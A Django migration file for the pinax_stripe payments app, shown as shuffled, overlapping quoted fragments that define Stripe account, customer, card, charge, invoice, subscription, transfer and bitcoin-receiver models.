max_length=100)), ('pending_webhooks', models.PositiveIntegerField(default=0)), ('api_version', models.CharField(blank=True, max_length=100)), ('customer', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE,", "models.DateTimeField(blank=True, null=True)), ('available', models.BooleanField(default=False)), ('available_on', models.DateTimeField(blank=True, null=True)), ('fee', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('fee_currency',", "null=True)), ('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer')), ('plan', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Plan')), ], options={ 'abstract': False, }, bases=(pinax.stripe.models.StripeAccountFromCustomerMixin,", "max_digits=9)), ('amount_received', models.DecimalField(decimal_places=2, default=Decimal('0'), max_digits=9)), ('bitcoin_amount', models.PositiveIntegerField()), ('bitcoin_amount_received', models.PositiveIntegerField(default=0)), ('bitcoin_uri', models.TextField(blank=True)), ('currency', models.CharField(default='usd',", "related_name='user_accounts', related_query_name='user_account', to='pinax_stripe.Customer')), ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_accounts', related_query_name='user_account', to=settings.AUTH_USER_MODEL)), ], ), migrations.AddField( model_name='invoiceitem', name='plan',", "max_digits=9, null=True)), ('application_fee', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('created', models.DateTimeField(blank=True, null=True)), ('currency', models.CharField(default='usd', max_length=25)),", "('stripe_id', models.CharField(max_length=255)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('currency', models.CharField(default='usd', max_length=10)), ('kind', models.CharField(blank=True, max_length=25)),", "related_query_name='user_account', to='pinax_stripe.Account')), ('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_accounts', related_query_name='user_account', to='pinax_stripe.Customer')), ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_accounts', related_query_name='user_account', to=settings.AUTH_USER_MODEL)), ],", "models.TextField(blank=True, null=True)), ('charges_enabled', models.BooleanField(default=False)), ('country', models.CharField(max_length=2)), ('debit_negative_balances', models.BooleanField(default=False)), ('decline_charge_on_avs_failure', models.BooleanField(default=False)), ('decline_charge_on_cvc_failure', models.BooleanField(default=False)), ('default_currency',", "('traceback', models.TextField()), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('event', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Event')), ], options={ 'abstract': False,", "null=True)), ('payout_statement_descriptor', models.TextField(blank=True, null=True)), ('payouts_enabled', models.BooleanField(default=False)), ('verification_disabled_reason', models.TextField(blank=True, null=True)), ('verification_due_by', models.DateTimeField(blank=True, null=True)), ('verification_timestamp',", "null=True)), ('total', models.DecimalField(decimal_places=2, max_digits=9)), ('date', models.DateTimeField()), ('webhooks_delivered_at', models.DateTimeField(blank=True, null=True)), ('charge', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE,", "field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Plan'), ), migrations.AddField( model_name='invoiceitem', name='subscription', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Subscription'), ),", "bases=(pinax.stripe.models.StripeAccountFromCustomerMixin, models.Model), ), migrations.CreateModel( name='Transfer', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191,", "models.TextField(blank=True, null=True)), ('description', models.TextField(blank=True, null=True)), ('kind', models.CharField(max_length=150)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('transfer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='charge_fee_details', to='pinax_stripe.Transfer')),", "migrations.CreateModel( name='Card', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)),", "('address_zip', models.TextField(blank=True)), ('address_zip_check', models.CharField(max_length=15)), ('brand', models.TextField(blank=True)), ('country', models.CharField(blank=True, max_length=2)), ('cvc_check', models.CharField(blank=True, max_length=15)), ('dynamic_last4',", "('webhooks_delivered_at', models.DateTimeField(blank=True, null=True)), ('charge', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='invoices', to='pinax_stripe.Charge')), ('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='invoices', to='pinax_stripe.Customer')),", "fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('name', models.TextField(blank=True)),", "unicode_literals from decimal import Decimal from django.conf import settings from django.db import migrations,", "('email', models.TextField(blank=True)), ('filled', models.BooleanField(default=False)), ('inbound_address', models.TextField(blank=True)), ('payment', models.TextField(blank=True)), ('refund_address', models.TextField(blank=True)), ('uncaptured_funds', models.BooleanField(default=False)), ('used_for_payment',", "null=True)), ('status', models.CharField(max_length=25)), ('transfer_group', models.TextField(blank=True, null=True)), ('type', models.TextField(blank=True, null=True)), ('event', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE,", "model_name='invoice', name='subscription', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Subscription'), ), migrations.AddField( model_name='customer', name='users', field=models.ManyToManyField(related_name='customers', related_query_name='customers', through='pinax_stripe.UserAccount',", "name='BankAccount', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('account_holder_name',", "('times_redeemed', models.PositiveIntegerField(blank=True, null=True)), ('valid', models.BooleanField(default=False)), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='Customer',", "models.TextField(blank=True)), ('address_state', models.TextField(blank=True)), ('address_country', models.TextField(blank=True)), ('address_zip', models.TextField(blank=True)), ('address_zip_check', models.CharField(max_length=15)), ('brand', models.TextField(blank=True)), ('country', models.CharField(blank=True,", "('business_url', models.TextField(blank=True, null=True)), ('charges_enabled', models.BooleanField(default=False)), ('country', models.CharField(max_length=2)), ('debit_negative_balances', models.BooleanField(default=False)), ('decline_charge_on_avs_failure', models.BooleanField(default=False)), ('decline_charge_on_cvc_failure', models.BooleanField(default=False)),", "from django.conf import settings from django.db import migrations, models import django.db.models.deletion import django.utils.timezone", "models.BooleanField(default=False)), ('webhook_message', jsonfield.fields.JSONField()), ('validated_message', jsonfield.fields.JSONField(blank=True, null=True)), ('valid', models.NullBooleanField()), ('processed', models.BooleanField(default=False)), ('request', models.CharField(blank=True, max_length=100)),", "null=True)), ('verification_fields_needed', jsonfield.fields.JSONField(blank=True, null=True)), ('authorized', models.BooleanField(default=True)), ('user', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='stripe_accounts', to=settings.AUTH_USER_MODEL)), ],", "('legal_entity_address_line1', models.TextField(blank=True, null=True)), ('legal_entity_address_line2', models.TextField(blank=True, null=True)), ('legal_entity_address_postal_code', models.TextField(blank=True, null=True)), ('legal_entity_address_state', models.TextField(blank=True, null=True)), ('legal_entity_dob',", "models.IntegerField()), ('exp_year', models.IntegerField()), ('funding', models.CharField(max_length=15)), ('last4', models.CharField(blank=True, max_length=4)), ('fingerprint', models.TextField()), ], options={ 'abstract':", "models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='stripe_accounts', to=settings.AUTH_USER_MODEL)), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='BankAccount',", "models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount_off', models.DecimalField(blank=True, decimal_places=2, max_digits=9,", "), migrations.CreateModel( name='Invoice', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at',", "models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='transfers', to='pinax_stripe.Event')), ('stripe_account', models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')), ], options={", "False, }, ), migrations.CreateModel( name='Charge', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191,", "unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('application_fee_percent', models.DecimalField(blank=True, decimal_places=2, default=None, max_digits=3, null=True)), ('cancel_at_period_end', models.BooleanField(default=False)), ('canceled_at', models.DateTimeField(blank=True,", "serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('application_fee_percent', models.DecimalField(blank=True, decimal_places=2, default=None, max_digits=3, null=True)), ('cancel_at_period_end',", "models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('account_holder_name', models.TextField()), ('account_holder_type', models.TextField()),", "models.CharField(blank=True, max_length=100)), ('pending_webhooks', models.PositiveIntegerField(default=0)), ('api_version', models.CharField(blank=True, max_length=100)), ('customer', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer')), ('stripe_account',", "), migrations.CreateModel( name='InvoiceItem', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=255)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)),", "models.BooleanField(default=False)), ('decline_charge_on_avs_failure', models.BooleanField(default=False)), ('decline_charge_on_cvc_failure', models.BooleanField(default=False)), ('default_currency', models.CharField(max_length=3)), ('details_submitted', models.BooleanField(default=False)), ('display_name', models.TextField(blank=True, null=True)), ('email',", "), migrations.AddField( model_name='card', name='customer', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer'), ), migrations.AddField( model_name='bitcoinreceiver', name='customer', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer'), ),", "False, }, ), migrations.CreateModel( name='Plan', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191)),", "('user', models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='Event',", "models.CharField(max_length=2)), ('debit_negative_balances', models.BooleanField(default=False)), ('decline_charge_on_avs_failure', models.BooleanField(default=False)), ('decline_charge_on_cvc_failure', models.BooleanField(default=False)), ('default_currency', models.CharField(max_length=3)), ('details_submitted', models.BooleanField(default=False)), ('display_name', models.TextField(blank=True,", "models.TextField(blank=True)), ('address_zip_check', models.CharField(max_length=15)), ('brand', models.TextField(blank=True)), ('country', models.CharField(blank=True, max_length=2)), ('cvc_check', models.CharField(blank=True, max_length=15)), ('dynamic_last4', models.CharField(blank=True,", "to=settings.AUTH_USER_MODEL)), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='Event', fields=[ ('id', models.CharField(editable=False, max_length=32,", "models.DateTimeField()), ('subtotal', models.DecimalField(decimal_places=2, max_digits=9)), ('tax', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('tax_percent', models.DecimalField(blank=True, decimal_places=2, max_digits=9,", "options={ 'abstract': False, }, ), migrations.CreateModel( name='Customer', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)),", "fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('kind', models.CharField(max_length=250)),", "models.NullBooleanField()), ('attempt_count', models.PositiveIntegerField(blank=True, null=True)), ('statement_descriptor', models.TextField(blank=True)), ('currency', models.CharField(default='usd', max_length=10)), ('closed', models.BooleanField(default=False)), ('description', models.TextField(blank=True)),", "models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_accounts', related_query_name='user_account', to='pinax_stripe.Account')), ('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_accounts', related_query_name='user_account', to='pinax_stripe.Customer')), ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_accounts', related_query_name='user_account',", "('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('account_holder_name', models.TextField()), ('account_holder_type', models.TextField()), ('bank_name', models.TextField(blank=True, null=True)), ('country', models.TextField()), ('currency', models.TextField()),", "('address_zip_check', models.CharField(max_length=15)), ('brand', models.TextField(blank=True)), ('country', models.CharField(blank=True, max_length=2)), ('cvc_check', models.CharField(blank=True, max_length=15)), ('dynamic_last4', models.CharField(blank=True, max_length=4)),", "primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=255)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('currency', models.CharField(default='usd', max_length=10)), ('kind',", "('destination_payment', models.TextField(blank=True, null=True)), ('failure_code', models.TextField(blank=True, null=True)), ('failure_message', models.TextField(blank=True, null=True)), ('livemode', models.BooleanField(default=False)), ('metadata', jsonfield.fields.JSONField(blank=True,", "('status', models.CharField(max_length=25)), ('transfer_group', models.TextField(blank=True, null=True)), ('type', models.TextField(blank=True, null=True)), ('event', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='transfers',", "], options={ 'abstract': False, }, ), migrations.CreateModel( name='BitcoinReceiver', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True,", "('closed', models.BooleanField(default=False)), ('description', models.TextField(blank=True)), ('paid', models.BooleanField(default=False)), ('receipt_number', models.TextField(blank=True)), ('period_end', models.DateTimeField()), ('period_start', models.DateTimeField()), ('subtotal',", "on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')), ('user', models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)), ], options={ 'abstract': False, }, ),", "models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('tax_percent', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('total', models.DecimalField(decimal_places=2, max_digits=9)), ('date',", "('legal_entity_gender', models.TextField(blank=True, null=True)), ('legal_entity_last_name', models.TextField(blank=True, null=True)), ('legal_entity_maiden_name', models.TextField(blank=True, null=True)), ('legal_entity_personal_id_number_provided', models.BooleanField(default=False)), ('legal_entity_phone_number', models.TextField(blank=True,", "models.DecimalField(decimal_places=2, max_digits=9)), ('currency', models.CharField(default='usd', max_length=10)), ('kind', models.CharField(blank=True, max_length=25)), ('period_start', models.DateTimeField()), ('period_end', models.DateTimeField()), ('proration',", "models.DateTimeField()), ('period_end', models.DateTimeField()), ('proration', models.BooleanField(default=False)), ('line_type', models.CharField(max_length=50)), ('description', models.CharField(blank=True, max_length=200)), ('quantity', models.IntegerField(blank=True, null=True)),", "from __future__ import unicode_literals from decimal import Decimal from django.conf import settings from", "models.TextField(blank=True, null=True)), ('legal_entity_verification_document', models.TextField(blank=True, null=True)), ('legal_entity_verification_status', models.TextField(blank=True, null=True)), ('type', models.TextField(blank=True, null=True)), ('metadata', jsonfield.fields.JSONField(blank=True,", "False, }, bases=(pinax.stripe.models.StripeAccountFromCustomerMixin, models.Model), ), migrations.CreateModel( name='Coupon', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)),", "('livemode', models.BooleanField(default=False)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('method', models.TextField(blank=True, null=True)), ('reversed', models.BooleanField(default=False)), ('source_transaction', models.TextField(blank=True, null=True)),", "null=True)), ('timezone', models.TextField(blank=True, null=True)), ('tos_acceptance_date', models.DateField(blank=True, null=True)), ('tos_acceptance_ip', models.TextField(blank=True, null=True)), ('tos_acceptance_user_agent', models.TextField(blank=True, null=True)),", "null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='Subscription', fields=[ ('id',", "models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer')), ('plan', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Plan')), ], options={ 'abstract': False, }, bases=(pinax.stripe.models.StripeAccountFromCustomerMixin, models.Model), ),", "('method', models.TextField(blank=True, null=True)), ('reversed', models.BooleanField(default=False)), ('source_transaction', models.TextField(blank=True, null=True)), ('source_type', models.TextField(blank=True, null=True)), ('statement_descriptor', models.TextField(blank=True,", "('legal_entity_verification_details', models.TextField(blank=True, null=True)), ('legal_entity_verification_details_code', models.TextField(blank=True, null=True)), ('legal_entity_verification_document', models.TextField(blank=True, null=True)), ('legal_entity_verification_status', models.TextField(blank=True, null=True)), ('type',", "models.TextField(blank=True, null=True)), ('failure_message', models.TextField(blank=True, null=True)), ('livemode', models.BooleanField(default=False)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('method', models.TextField(blank=True, null=True)),", "models.BooleanField(default=False)), ('inbound_address', models.TextField(blank=True)), ('payment', models.TextField(blank=True)), ('refund_address', models.TextField(blank=True)), ('uncaptured_funds', models.BooleanField(default=False)), ('used_for_payment', models.BooleanField(default=False)), ], options={", "('transfer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='charge_fee_details', to='pinax_stripe.Transfer')), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='UserAccount', fields=[", "False, }, ), migrations.CreateModel( name='TransferChargeFee', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('amount', models.DecimalField(decimal_places=2,", "('payout_statement_descriptor', models.TextField(blank=True, null=True)), ('payouts_enabled', models.BooleanField(default=False)), ('verification_disabled_reason', models.TextField(blank=True, null=True)), ('verification_due_by', models.DateTimeField(blank=True, null=True)), ('verification_timestamp', models.DateTimeField(blank=True,", "models.TextField(blank=True, null=True)), ('legal_entity_verification_details_code', models.TextField(blank=True, null=True)), ('legal_entity_verification_document', models.TextField(blank=True, null=True)), ('legal_entity_verification_status', models.TextField(blank=True, null=True)), ('type', models.TextField(blank=True,", "models.TextField(blank=True, null=True)), ('payouts_enabled', models.BooleanField(default=False)), ('verification_disabled_reason', models.TextField(blank=True, null=True)), ('verification_due_by', models.DateTimeField(blank=True, null=True)), ('verification_timestamp', models.DateTimeField(blank=True, null=True)),", "name='customer', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer'), ), migrations.AlterUniqueTogether( name='useraccount', unique_together=set([('user', 'account')]), ), migrations.AlterUniqueTogether( name='plan', unique_together=set([('stripe_id', 'stripe_account')]),", "models.CharField(max_length=15)), ('interval_count', models.IntegerField()), ('name', models.CharField(max_length=150)), ('statement_descriptor', models.TextField(blank=True)), ('trial_period_days', models.IntegerField(blank=True, null=True)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)),", "to='pinax_stripe.Customer'), ), migrations.AlterUniqueTogether( name='useraccount', unique_together=set([('user', 'account')]), ), migrations.AlterUniqueTogether( name='plan', unique_together=set([('stripe_id', 'stripe_account')]), ), ]", "models.DateTimeField(default=django.utils.timezone.now)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('currency', models.CharField(default='usd', max_length=10)), ('kind', models.CharField(blank=True, max_length=25)), ('period_start', models.DateTimeField()), ('period_end',", "to=settings.AUTH_USER_MODEL), ), migrations.AddField( model_name='charge', name='customer', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='charges', to='pinax_stripe.Customer'), ), migrations.AddField( model_name='charge',", "models.BooleanField(default=False)), ('used_for_payment', models.BooleanField(default=False)), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='Card', fields=[ ('id',", "models.NullBooleanField()), ('disputed', models.NullBooleanField()), ('refunded', models.NullBooleanField()), ('captured', models.NullBooleanField()), ('receipt_sent', models.BooleanField(default=False)), ('charge_created', models.DateTimeField(blank=True, null=True)), ('available',", "null=True)), ('legal_entity_verification_details_code', models.TextField(blank=True, null=True)), ('legal_entity_verification_document', models.TextField(blank=True, null=True)), ('legal_entity_verification_status', models.TextField(blank=True, null=True)), ('type', models.TextField(blank=True, null=True)),", "models.BooleanField(default=False)), ('display_name', models.TextField(blank=True, null=True)), ('email', models.TextField(blank=True, null=True)), ('legal_entity_address_city', models.TextField(blank=True, null=True)), ('legal_entity_address_country', models.TextField(blank=True, null=True)),", "('bitcoin_amount', models.PositiveIntegerField()), ('bitcoin_amount_received', models.PositiveIntegerField(default=0)), ('bitcoin_uri', models.TextField(blank=True)), ('currency', models.CharField(default='usd', max_length=10)), ('description', models.TextField(blank=True)), ('email', models.TextField(blank=True)),", "name='Charge', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('source',", "('api_version', models.CharField(blank=True, max_length=100)), ('customer', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer')), ('stripe_account', models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE,", "primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('name', models.TextField(blank=True)), ('address_line_1', models.TextField(blank=True)), ('address_line_1_check', models.CharField(max_length=15)),", "null=True, on_delete=django.db.models.deletion.CASCADE, related_name='stripe_accounts', to=settings.AUTH_USER_MODEL)), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='BankAccount', fields=[", "('name', models.TextField(blank=True)), ('address_line_1', models.TextField(blank=True)), ('address_line_1_check', models.CharField(max_length=15)), ('address_line_2', models.TextField(blank=True)), ('address_city', models.TextField(blank=True)), ('address_state', models.TextField(blank=True)), ('address_country',", "to='pinax_stripe.Customer'), ), migrations.AddField( model_name='bitcoinreceiver', name='customer', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer'), ), migrations.AlterUniqueTogether( name='useraccount', unique_together=set([('user', 'account')]), ),", "name='BitcoinReceiver', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('active',", "('amount', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('amount_refunded', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('description', models.TextField(blank=True)), ('paid',", "}, ), migrations.CreateModel( name='EventProcessingException', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('data', models.TextField()), ('message',", "('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('currency', models.CharField(default='usd', max_length=10)), ('kind', models.CharField(blank=True, max_length=25)), ('period_start', models.DateTimeField()),", "('destination', models.TextField(blank=True, null=True)), ('destination_payment', models.TextField(blank=True, null=True)), ('failure_code', models.TextField(blank=True, null=True)), ('failure_message', models.TextField(blank=True, null=True)), ('livemode',", "to='pinax_stripe.Event')), ('stripe_account', models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')), ], options={ 'abstract': False, }, ),", "('legal_entity_verification_details_code', models.TextField(blank=True, null=True)), ('legal_entity_verification_document', models.TextField(blank=True, null=True)), ('legal_entity_verification_status', models.TextField(blank=True, null=True)), ('type', models.TextField(blank=True, null=True)), ('metadata',", "models.TextField(blank=True, null=True)), ('legal_entity_dob', models.DateField(blank=True, null=True)), ('legal_entity_first_name', models.TextField(blank=True, null=True)), ('legal_entity_gender', models.TextField(blank=True, null=True)), ('legal_entity_last_name', models.TextField(blank=True,", "jsonfield.fields.JSONField(blank=True, null=True)), ('percent_off', models.PositiveIntegerField(blank=True, null=True)), ('redeem_by', models.DateTimeField(blank=True, null=True)), ('times_redeemed', models.PositiveIntegerField(blank=True, null=True)), ('valid', models.BooleanField(default=False)),", "('description', models.TextField(blank=True)), ('paid', models.NullBooleanField()), ('disputed', models.NullBooleanField()), ('refunded', models.NullBooleanField()), ('captured', models.NullBooleanField()), ('receipt_sent', models.BooleanField(default=False)), ('charge_created',", "'monthly')], max_length=7, null=True)), ('payout_schedule_monthly_anchor', models.PositiveSmallIntegerField(blank=True, null=True)), ('payout_schedule_weekly_anchor', models.TextField(blank=True, null=True)), ('payout_statement_descriptor', models.TextField(blank=True, null=True)), ('payouts_enabled',", "models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='invoices', to='pinax_stripe.Charge')), ('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='invoices', to='pinax_stripe.Customer')), ], options={ 'abstract': False,", "models.NullBooleanField()), ('receipt_sent', models.BooleanField(default=False)), ('charge_created', models.DateTimeField(blank=True, null=True)), ('available', models.BooleanField(default=False)), ('available_on', models.DateTimeField(blank=True, null=True)), ('fee', models.DecimalField(blank=True,", "serialize=False)), ('stripe_id', models.CharField(max_length=255)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('currency', models.CharField(default='usd', max_length=10)), ('kind', models.CharField(blank=True,", "models.TextField(blank=True)), ('currency', models.CharField(default='usd', max_length=10)), ('description', models.TextField(blank=True)), ('email', models.TextField(blank=True)), ('filled', models.BooleanField(default=False)), ('inbound_address', models.TextField(blank=True)), ('payment',", "coding: utf-8 -*- # Generated by Django 1.11.8 on 2018-08-06 19:00 from __future__", "Generated by Django 1.11.8 on 2018-08-06 19:00 from __future__ import unicode_literals from decimal", "models.PositiveIntegerField(blank=True, null=True)), ('statement_descriptor', models.TextField(blank=True)), ('currency', models.CharField(default='usd', max_length=10)), ('closed', models.BooleanField(default=False)), ('description', models.TextField(blank=True)), ('paid', models.BooleanField(default=False)),", "('transfer_group', models.TextField(blank=True, null=True)), ('type', models.TextField(blank=True, null=True)), ('event', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='transfers', to='pinax_stripe.Event')), ('stripe_account',", "serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('name', models.TextField(blank=True)), ('address_line_1', models.TextField(blank=True)), ('address_line_1_check', models.CharField(max_length=15)), ('address_line_2',", "migrations.AddField( model_name='bitcoinreceiver', name='customer', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer'), ), migrations.AlterUniqueTogether( name='useraccount', unique_together=set([('user', 'account')]), ), migrations.AlterUniqueTogether( name='plan',", "models.TextField(blank=True, null=True)), ('type', models.TextField(blank=True, null=True)), ('event', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='transfers', to='pinax_stripe.Event')), ('stripe_account', models.ForeignKey(blank=True,", "related_name='bank_accounts', to='pinax_stripe.Account')), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='BitcoinReceiver', fields=[ ('id', models.CharField(editable=False,", "('country', models.CharField(max_length=2)), ('debit_negative_balances', models.BooleanField(default=False)), ('decline_charge_on_avs_failure', models.BooleanField(default=False)), ('decline_charge_on_cvc_failure', models.BooleanField(default=False)), ('default_currency', models.CharField(max_length=3)), ('details_submitted', models.BooleanField(default=False)), ('display_name',", "('start', models.DateTimeField()), ('status', models.CharField(max_length=25)), ('trial_end', models.DateTimeField(blank=True, null=True)), ('trial_start', models.DateTimeField(blank=True, null=True)), ('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer')),", "('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('currency', models.CharField(default='usd', max_length=10)), ('application', models.TextField(blank=True,", "models.TextField(blank=True)), ('trial_period_days', models.IntegerField(blank=True, null=True)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('stripe_account', models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')),", "('Weekly', 'weekly'), ('Monthly', 'monthly')], max_length=7, null=True)), ('payout_schedule_monthly_anchor', models.PositiveSmallIntegerField(blank=True, null=True)), ('payout_schedule_weekly_anchor', models.TextField(blank=True, null=True)), ('payout_statement_descriptor',", "('refunded', models.NullBooleanField()), ('captured', models.NullBooleanField()), ('receipt_sent', models.BooleanField(default=False)), ('charge_created', models.DateTimeField(blank=True, null=True)), ('available', models.BooleanField(default=False)), ('available_on', models.DateTimeField(blank=True,", "primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('kind', models.CharField(max_length=250)), ('livemode', models.BooleanField(default=False)), ('webhook_message', jsonfield.fields.JSONField()),", "max_length=10)), ('application', models.TextField(blank=True, null=True)), ('description', models.TextField(blank=True, null=True)), ('kind', models.CharField(max_length=150)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('transfer', 